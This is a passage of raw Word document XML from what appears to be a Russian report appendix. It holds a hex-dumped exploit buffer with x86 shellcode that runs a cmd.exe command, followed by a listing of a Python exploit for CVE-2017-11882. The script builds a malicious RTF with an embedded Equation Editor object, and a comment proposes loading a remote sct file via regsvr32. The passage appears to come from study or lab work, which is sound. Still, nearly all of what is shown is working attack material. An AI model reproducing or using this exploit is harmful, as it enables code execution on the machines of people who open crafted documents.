        <w:t>6a 65 7a 6b 76 63 77 69 67 71 75 66 61 75 6c 77</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537CC8D7" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>77 61 66 78 72 73 76 72 63 6f 6c 70 6e 79 6f 6c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7531C422" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>71 6c 78 73 79 75 6a 68 65 70 6a 61 67 79 64 6f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113E3900" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>6a 61 68 61 64 64 62 6c 64 61 7a 78 64 63 79 75</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1D772A" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>6f</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 74 74 70 78 7a 69 70 6a 64 6e 67 65 6f 68</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547148A5" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>69 78 77 67 67 7a 6f 69 74 6b 65 77 66 6e 71 71</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FCB93C" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>63 64 71 6a 6b 66 64 62 79 71 65 68 67 78 6a 68</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325AFDBA" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>68 71 76 70 6a 62 6f 73 64 75 6d 62 65 72 6e 6f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C4949F" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>71 78 6b 65 6f 7a 68 67 78 6a 6b 71 62 6d 75 75</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B867F9C" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6a 68 78 64 66 76 7a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>7a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 6f 71 78 70 76 78 66 66</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DA7A6E" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>6e 6b 76 64 6b 79 63 79 78 70 6e 67 6a 69 41 41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6597CA6A" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3D3979" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D29F30" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1931D22D" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2758C4BE" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13806FF0" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41530588" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290806DA" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FBA7DF" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5863E536" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5D223C" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF71491" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DCBE11" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A745F47" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D77FD1C" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>41 41 41 41 41 41 97 12 50 62 31 c0 04 10 64 8b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F35FE9B" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>48 20 64 8b 40 20 8b 40 0c 8b 40 14 8b 10 89 d0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25753536" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>8b 10 89 d0 8b 40 10 89 c7 31 d2 52 31 c9 68 2e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C87153D" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>74 78 74 68 6f 75 74 31 68 73 20 3e 20 68 6e 64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0546769E" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>6f 77 68 3a 5c 57 69 68 69 72 20 43 68 2f 63 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B413A60" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>64 68 65 78 65 20 68 63 6d 64 2e 89 e1 52 52 52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106970CF" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>52 52 52 52 52 52 52 52 52 52 52 52 52 6a 44 89</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38197976" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>e0 52 52 52 52 89 e3 53 50 52 52 52 52 52 52 51</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4455698D" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>52 89 f8 31 f6 66 be 2a 6a c1 e6 03 01 f0 ff d0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBF1D38" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>89 c3 89 f8 31 f6 66 be 88 9a c1 e6 02 01 f0 ff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6D1372" w14:textId="0DD09C67" w:rsidR="00AA50CA" w:rsidRPr="004D4772" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4772">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F4C6A4" w14:textId="77777777" w:rsidR="00B45BC8" w:rsidRPr="004D4772" w:rsidRDefault="00B45BC8" w:rsidP="00B45BC8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</w:p>
    <w:p w14:paraId="4CE839DA" w14:textId="77777777" w:rsidR="00B45BC8" w:rsidRDefault="00B45BC8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14:paraId="1E755A5F" w14:textId="17468260" w:rsidR="00B45BC8" w:rsidRPr="00B91720" w:rsidRDefault="00B45BC8" w:rsidP="00B45BC8">
      <w:pPr>
        <w:pStyle w:val="af9"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Приложение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1718AB5B" w14:textId="153C317C" w:rsidR="00B45BC8" w:rsidRPr="00DB066B" w:rsidRDefault="00B45BC8" w:rsidP="00B45BC8">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB066B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">программы </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB066B">
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00DB066B" w:rsidRPr="00DB066B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
      <w:r w:rsidR="00DB066B" w:rsidRPr="00277FB0">
        <w:t>109</w:t>
      </w:r>
      <w:r w:rsidR="00DB066B" w:rsidRPr="00DB066B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="00DB066B" w:rsidRPr="00277FB0">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00DB066B" w:rsidRPr="00DB066B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidR="00DB066B" w:rsidRPr="00277FB0">
        <w:t>-2017-11882</w:t>
      </w:r>
      <w:r w:rsidR="00DB066B">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB066B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB066B">
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0600974A" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve"># Original </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>https://github.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>embedi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>/CVE-2017-11882</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB8994B" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t># This version accepts a command with 109 bytes long in maximum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DDC0EA" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve"># Sorry I don't know how to read the struct in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>objdata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">, hence I cannot modify the length parameter to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>aquire</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve"> arbitrary length code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213EB5B7" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve"># But that's enough in exploitation. We can use regsvr32 to load </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>sct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve"> file </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>remotely.:)</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7DCDE5C0" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EF3E066" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>argparse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4CF48764" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFAD51A" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t>from struct import pack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CE351D" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41D87E3D" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="296FC8CC" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t>head=r'''{</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>\fonttbl{\f0\fnil\fcharset0 Calibri;}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4076FD65" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">{\*\generator Riched20 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>6.3.9600}\viewkind4\uc1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2FE3E9E1" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t>\pard\sa200\sl276\slmult1\f0\fs22\lang9'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55901C94" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14A52A51" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>objclass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>=r'''{\object\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>objemb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>objupdate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>{\*\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>objclass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve"> Equation.3}\objw380\objh260{\*\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>objdata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve"> 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff000000000000000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</w:t>
      </w:r>
      <w:r w:rsidRPr="00277FB0">
        <w:lastRenderedPageBreak/>
        <w:t>fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffefffffffe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</w:t>
      </w:r>
      <w:r w:rsidRPr="00277FB0">
        <w:lastRenderedPageBreak/>
        <w:t>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'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F552305" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="202D3622" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01827C7D" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t>tail=r'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EE7B7D" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t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w:t>
      </w:r>
      <w:r w:rsidRPr="00277FB0">
        <w:lastRenderedPageBreak/>
        <w:t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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2904271B" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>}{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>\result {\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>rtlch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>\fcs1 \af0 \</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>ltrch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>\fcs0 \dn8\insrsid95542\charrsid95542 {\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>pict</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>{\*\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>picprop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>\shplid1025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shapeType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75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FlipH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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5CFABB" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t>{\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>sp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>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FlipV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LockAspectRatio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1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pictureGray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pictureBiLevel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RecolorFillAsPicture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UseShapeAnchor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Filled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HitTestFill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1}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0B89CC" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t>{\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>sp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
